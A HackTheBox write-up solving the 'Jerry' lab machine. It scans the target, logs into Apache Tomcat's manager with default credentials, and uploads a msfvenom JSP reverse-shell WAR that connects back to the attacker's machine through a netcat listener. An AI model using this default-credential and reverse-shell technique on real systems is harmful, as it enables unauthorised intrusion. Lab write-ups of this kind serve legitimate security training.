Jerry
Jerry writeup by Thamizhiniyan C S
Last updated
Jerry writeup by Thamizhiniyan C S
Last updated
Hello everyone, In this writeup we are going to solve Jerry from HackTheBox.
Link for the machine : https://app.hackthebox.com/machines/Jerry
Lets Start 🙌
Connect to the HTB server by using the OpenVpn configuration file that’s generated by HTB.
[ Click Here to learn more about how to connect to vpn and access the boxes. ]
After connecting to the vpn service, click on Join Machine to access the machine’s ip.
After joining the machine you can see the IP Address of the target machine.
First start the reconnaissance by running rustscan
on the target IP address.
Command: rustscan -a 10.10.10.95 -- -A -T4 -v -Pn
From the results of rustscan
, we can see that on port 8080
, Apache Tomcat service is running.
I visited the web server running on http://10.10.10.95:8080/
.
We can see the default home page of the Apache Tomcat server. I started exploring by clicking all the buttons and links in the home page.
I clicked the Manager App button and it redirected me to the following link: http://10.10.10.95:8080/manager/html, which prompted me for a username and password:
On investigating about the above URL, I found this
I tried admin:admin
combination in the prompt and it thrown me the following error:
From the above error, we can see that they have shown a example, in which they have used tomcat:s3cret
combination. Let’s give it a try with this combination.
It worked and we got access to the Application Manager.
Further surfing the Application Manager, we can see that there is an option to upload files of type WAR.
We can generate a msfvenom
reverse shell and upload it as mentioned here:
Generate the Reverse Shell using the following command:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<HTB_tun_IP> LPORT=8888 -f war -o revshell.war
Now upload this revshell.war
file and click deploy.
Now if we check the Applications table, we can see that a new path /revshell
is generated.
Before clicking or viewing the /revshell
link, start a netcat
listener on your attack box / local machine on port 8888
Now click the /revshell
and check the netcat
listener.
We have successfully got access to the target machine.
Now we have to look out for the flags. I started surfing the machine. I visited the C:\Users
directory and found the following users:
I checked the Administrator directory. In the Desktop folder of Administrator found the flags
directory.
The flags directory had a file named 2 for the price of 1.txt
.
You can view the contents of the 2 for the price of 1.txt
file using the command: more "2 for the price of 1.txt"
We have successfully found both the user and root flags.
Thank You !!!!!!!